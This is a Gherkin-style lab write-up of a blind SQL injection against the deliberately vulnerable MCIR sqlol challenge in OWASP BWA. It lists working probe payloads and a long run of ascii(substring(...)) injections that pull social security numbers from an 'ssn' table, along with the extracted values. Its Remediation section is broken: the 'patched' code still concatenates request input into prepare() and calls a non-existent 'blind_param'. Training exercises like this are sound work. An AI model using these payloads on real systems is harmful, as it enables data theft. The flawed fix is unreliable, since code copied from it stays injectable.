## Version 1.4.1
## language: en

Feature:
  TOE:
    MCIR
  Category:
    sql injection
  Location:
    http://192.168.1.150/MCIR/sqlol/challenges/challenge5.php - user(field)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.191: Protect data with maximum level
  Goal:
    Find the table of social security numbers and extract its information
  Recommendation:
    Validate and sanitise user input and use parameterized queries

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
  TOE information:
    Given I am running owasp bwa in VM virtualBox
    And I access to the next url
    """
    http://MCIR/
    """
    And I can see all the vulnerabilities of the app

  Scenario: Normal use case
  Show
    Given I access to the section sqlol
    """
    http://MCIR/sqlol/select.php
    """
    And I can see the injection parameters configuration
    And I got to the following link
    """
    http://MCIR/sqlol/challenges/challenge5.php
    """
    And I see the following text
    """
    Your objective is to find the table of social
    security numbers present in the database and extract its information.
    """

  Scenario: Static detection
  Doesn't validate characters and doesn't use parameterized queries
    When I look at the code in the following link
    """
    https://github.com/SpiderLabs/MCIR/blob/master/sqlol/select.php
    """
    Then I can see following lines of code
    """
    75 $where_clause = 'WHERE isadmin = ' . $_REQUEST['inject_string'];
    """
    Then I can conclude that the characters entered by user doesn't sanitise
    And I see the following lines
    """
    24 $db_conn->SetFetchMode(ADODB_FETCH_ASSOC);
    25 $results = $db_conn->Execute($query);
    """
    And I can see that doesn't use parameterized queries
    Then I conclude that the application is vulnerable  to injection sql


  Scenario: Dynamic detection
  Using true or false query values
    Given I'am access to the application
    """
    http://MCIR/sqlol/challenges/challenge5.php
    """
    Then I see a text field
    And I try insert a query that return false
    """
    1 ' or 1=2 #
    """
    Then The application doesn't show any result
    And I try insert a query that return true
    """
    1 ' or 1=1 #
    """
    And I get the followiong output
    """
    God results!
    """
    Then I can conclude that the application is vuln to sql injection

  Scenario: exploitation
  Get information of the table of social security numbers
    Given I need to know the table name of social security numbers
    Then I put in the text field the following query:
    """
    SELECT * FROM INFORMATION_SCHEMA.TABLES
    WHERE TABLE_TYPE = 'BASE TABLE'
    """
    Then I get the output:
    """
    sqlol [TABLE_NAME] => ssn
    """
    Then The application return a message when a query is true
    """
    God results!
    """
    And I use ascii() function to get the value of characters from ssn table
    Then I use the name of the table to generate the injection
    And I test all characters ascii to get the value from the first column
    """
    1' or ascii(substring((select ssn from ssn limit 0,1),1,1)) = 48 #
    1' or ascii(substring((select ssn from ssn limit 0,1),2,1)) = 48 #
    1' or ascii(substring((select ssn from ssn limit 0,1),3,1)) = 48 #
    1' or ascii(substring((select ssn from ssn limit 0,1),4,1)) = 45 #
    1' or ascii(substring((select ssn from ssn limit 0,1),5,1)) = 48 #
    1' or ascii(substring((select ssn from ssn limit 0,1),6,1)) = 48 #
    1' or ascii(substring((select ssn from ssn limit 0,1),7,1)) = 45 #
    1' or ascii(substring((select ssn from ssn limit 0,1),8,1)) = 49 #
    1' or ascii(substring((select ssn from ssn limit 0,1),9,1)) = 49 #
    1' or ascii(substring((select ssn from ssn limit 0,1),10,1)) = 49 #
    1' or ascii(substring((select ssn from ssn limit 0,1),11,1)) = 50 #
    """
    And I get the following result when convert to ascii
    """
    000-00-1112
    """
    Then I test all characters ascii to get the value from the second column
    """
    1 ' or ascii(substring((select ssn from ssn limit 1,1),1,1)) = 48 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),2,1)) = 49 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),3,1)) = 50 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),4,1)) = 45 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),5,1)) = 51 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),6,1)) = 52 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),7,1)) = 45 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),8,1)) = 53 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),9,1)) = 54 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),10,1)) = 55 #
    1 ' or ascii(substring((select ssn from ssn limit 1,1),11,1)) = 56 #
    """
    And I get the following result when convert to ascii
    """
    012-34-5678
    """
    And I can get the social security numbers
    """
    000-00-1112
    012-34-5678
    111-22-3333
    666-67-6776
    999-99-9999
    """

  Scenario: Remediation
  Using parameterized queries
    Given I am running MCIR in OWASP BWA
    And I detect that application doesn't use parameterized queries
    Then The vulnerabilitie can be patched using PDO
    """
    75 $where_clause = $pdo->prepare('WHERE isadmin = '
    . $_REQUEST['inject_string']);
    """
    And I can use the same tecnique in the following lines
    """
    25 $results->blind_param('q',$query);
    26 $db_conn->execute($query);
    """
    Then Using this methods we can be prevent a sql injection

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.9/10 (High) - AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:F/RL:O/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2019-03-22

